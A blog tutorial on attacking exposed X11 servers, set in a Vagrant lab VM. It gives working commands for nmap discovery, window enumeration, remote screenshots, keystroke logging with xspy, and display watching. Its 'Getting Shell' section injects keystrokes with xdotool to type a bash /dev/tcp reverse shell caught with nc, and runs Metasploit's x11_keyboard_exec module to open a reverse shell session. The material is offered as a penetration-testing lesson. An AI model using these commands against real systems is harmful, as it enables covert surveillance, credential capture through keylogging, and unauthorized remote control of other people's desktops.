13 May 2016

X11 Hacking


This tutorial is based on the X11 server in the PWN Lab project. To install the VM, follow the instructions in the pwn_lab README, then execute the commands below. This VM will take a while to finish installing and configuring as it needs to download and install the ubuntu-desktop packages.

git clone https://github.com/ztgrace/pwn_lab.git
cd pwn_lab/x11
vagrant up

If all goes well, you should have a VM running that looks like this:

X11 VM

Attacker Setup

Install some required packages:

apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy

Installing xwatchwin

wget http://www.ibiblio.org/pub/X11/contrib/utilities/xwatchwin.tar.gz
tar zxvf xwatchwin.tar.gz
cd xwatchwin/
xmkmf && make && make install


X11 generally runs on ports 6000-60063, however it’s most typically found on ports 6000-6002. We can use Nmap to scan for and identify X11.

root@pwnlab-kali-mini:~# nmap -sV -n -v -p 6000-6002

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-02 22:29 EST
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 22:29
Scanning [1 port]
Completed ARP Ping Scan at 22:29, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:29
Scanning [3 ports]
Discovered open port 6000/tcp on
Completed SYN Stealth Scan at 22:29, 0.00s elapsed (3 total ports)
Initiating Service scan at 22:29
Scanning 1 service on
Completed Service scan at 22:29, 6.01s elapsed (1 service on 1 host)
NSE: Script scanning
Nmap scan report for
Host is up (0.00044s latency).
6000/tcp open   X11     X.Org (open)
6001/tcp closed X11:1
6002/tcp closed X11:2
MAC Address: 08:00:27:1A:F3:00 (Cadmus Computer Systems)
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.21 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (152B)

Gathering Window Info

Before we start exploiting the system, it’s useful to gather some information about the windows. The xwininfo command

root@pwnlab-kali-mini:~# xwininfo -root -tree -display

xwininfo: Window id: 0x101 (the root window) (has no name)

  Root window id: 0x101 (the root window) (has no name)
  Parent window id: 0x0 (none)
     40 children:
     0x30002a7 "update-manager": ()  10x10+-100+-100  +-100+-100
     0x3000003 (has no name): ("update-manager" "Update-manager")  254x98+0+0  +0+0
        1 child:
        0x3000004 (has no name): ()  1x1+-1+-1  +-1+-1
     0x3000001 "update-manager": ("update-manager" "Update-manager")  10x10+10+10  +10+10
        1 child:
        0x3000002 (has no name): ()  1x1+-1+-1  +9+9
     0x2e00003 "update-notifier": ()  10x10+-100+-100  +-100+-100
     0x2e00001 "update-notifier": ("update-notifier" "Update-notifier")  10x10+10+10  +10+10
        1 child:
        0x2e00002 (has no name): ()  1x1+-1+-1  +9+9
     0x2c00001 "applet.py": ("applet.py" "Applet.py")  10x10+10+10  +10+10
        1 child:
        0x2c00002 (has no name): ()  1x1+-1+-1  +9+9
     0x1c00001 (has no name): ()  10x10+-20+-20  +-20+-20
     0xe00001 "Terminal": ("gnome-terminal" "Gnome-terminal")  10x10+10+10  +10+10
        1 child:
        0xe00002 (has no name): ()  1x1+-1+-1  +9+9
     0x1200068 (has no name): ()  10x10+0+0  +0+0

Screenshot The Display

The xwd tool can be used to create a screenshot of the remote desktop.

xwd -root -screen -silent -display > screenshot.xwd
convert screenshot.xwd screenshot.png


Keystroke logging

Keystroke logging can be accomplished using the xspy tool.

root@pwnlab-kali-mini:~# xspy
opened for snoopng

X11 VM

Watching The Display

To watch the display, you can use xwatchwin to watch a specific window or the entire desktop using the root window identifier.

./xwatchwin -u 0.5 root

Getting Shell

Method 1: xdotool

xdotool key alt+F2
xdotool type 'xterm'
xdotool key KP_Enter
xdotool type --delay 50 'bash -i >& /dev/tcp/ 0>&1'
xdotool key KP_Enter

On the attacker machine, catch the reverse shell:

# nc -lnvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 52876

Method 2: Metasploit

A recent Metasploit module was released and has simplified this attack by registering a virtual keyboard, then typing in the specified payload.

016-02-03 07:07:30 - S:0 J:0  > use exploit/unix/x11/x11_keyboard_exec
2016-02-03 07:07:32 - S:0 J:0  exploit(x11_keyboard_exec) > show options

Module options (exploit/unix/x11/x11_keyboard_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST    yes       The target address
   RPORT      6000             yes       The target port
   TIME_WAIT  5                yes       Time to wait for opening GUI windows in seconds

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   xterm (Generic)

2016-02-03 07:07:36 - S:0 J:0  exploit(x11_keyboard_exec) > set LHoST
LHoST =>
2016-02-03 07:07:52 - S:0 J:0  exploit(x11_keyboard_exec) > exploit

[*] Started reverse TCP handler on
[*] - Register keyboard
[*] - Opening "Run Application"
[*] - Waiting 5 seconds...
[*] - Opening xterm
[*] - Waiting 5 seconds...
[*] - Typing and executing payload
[*] Command shell session 1 opened ( -> at 2016-02-03 07:09:20 -0600

uid=1000(vagrant) gid=1000(vagrant) groups=4(adm),20(dialout),24(cdrom),46(plugdev),108(lpadmin),109(sambashare),110(admin),1000(vagrant)

Don’t Forget About Desktops!

Most Linux window managers have multiple desktops. I’ve come across an open X11 server on an engagement with nothing on the first desktop, but a root shell on a different one. Using the xdotool, you can change which desktop you’re viewing and manipulating. Be warned, This desktop switch would be visible to anyone else viewing the desktop.

export DISPLAY=
xdotool get_desktop
xdotool set_desktop 1

A stealither way of exploiting this root shell would be to comb through the xwininfo output, and using the window option of xdotool to send commands directly to the window.


comments powered by Disqus